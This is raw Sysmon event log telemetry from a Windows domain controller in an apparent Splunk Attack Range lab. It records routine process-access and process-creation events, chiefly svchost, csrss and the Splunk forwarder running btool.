13:36:32.529{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003400Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:32.529{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003399Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:36:32.529{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003398Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:32.529{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003397Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:36:32.529{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003396Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:32.529{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-8EE0-6005-A300-00000000A301}4956C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000003395Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:32.529{59A5CD1D-8EE0-6005-A200-00000000A301}49084924C:\Windows\system32\cmd.exe{59A5CD1D-8EE0-6005-A300-00000000A301}4956C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 
154100x80000000000000003394Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:32.538{59A5CD1D-8EE0-6005-A300-00000000A301}4956C:\Program Files\SplunkUniversalForwarder\bin\btool.exe8.0.2btoolsplunk ApplicationSplunk Inc.btool.exebtool server list general --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=BC53EBF68CFA6E8A254D89ABEC89A65D,SHA256=97024B4A7182D9C253B1AC4E56A1C8F3BC8808B79E6D022EF27B95003622F0A4,IMPHASH=572E0CF4672412FA940B0E1835926B3B{59A5CD1D-8EE0-6005-A200-00000000A301}4908C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /c btool server list general --no-log 10341000x80000000000000003393Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:32.529{59A5CD1D-8E58-6005-3A00-00000000A301}36643684C:\Windows\system32\conhost.exe{59A5CD1D-8EE0-6005-A200-00000000A301}4908C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003392Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:36:32.529{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003391Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:32.529{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003390Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:36:32.529{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003389Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:32.529{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003388Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:36:32.529{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003387Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:32.529{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003386Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:36:32.529{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003385Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:32.529{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003384Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:36:32.529{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003383Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:32.529{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-8EE0-6005-A200-00000000A301}4908C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000003382Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:32.529{59A5CD1D-8EDF-6005-9E00-00000000A301}47284532C:\Program Files\SplunkUniversalForwarder\bin\Splunk.EXE{59A5CD1D-8EE0-6005-A200-00000000A301}4908C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\ucrtbase.dll+9ea4a|C:\Windows\System32\ucrtbase.dll+9e42e|C:\Program Files\SplunkUniversalForwarder\bin\Splunk.EXE+43bc6|C:\Program Files\SplunkUniversalForwarder\bin\Splunk.EXE+6665|C:\Program Files\SplunkUniversalForwarder\bin\Splunk.EXE+14738|C:\Program 
Files\SplunkUniversalForwarder\bin\Splunk.EXE+d8a0|C:\Program Files\SplunkUniversalForwarder\bin\Splunk.EXE+1adfc|C:\Program Files\SplunkUniversalForwarder\bin\Splunk.EXE+4cf68|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000003381Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:32.533{59A5CD1D-8EE0-6005-A200-00000000A301}4908C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c btool server list general --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{59A5CD1D-8EDF-6005-9E00-00000000A301}4728C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe"C:\Program Files\SplunkUniversalForwarder\bin\Splunk.EXE" restart --waitonpid=2532 10341000x80000000000000003380Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:32.497{59A5CD1D-8EDF-6005-A100-00000000A301}11561240C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE{59A5CD1D-8E56-6005-3000-00000000A301}2532C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+116e675|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+116e1a6|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+f344c|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+f2a91|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+19fdb50|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003379Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:36:32.247{59A5CD1D-8E58-6005-3A00-00000000A301}36643684C:\Windows\system32\conhost.exe{59A5CD1D-8EDF-6005-A100-00000000A301}1156C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003378Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:32.247{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003377Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:36:32.247{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003376Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:32.247{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003375Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:36:32.247{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003374Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 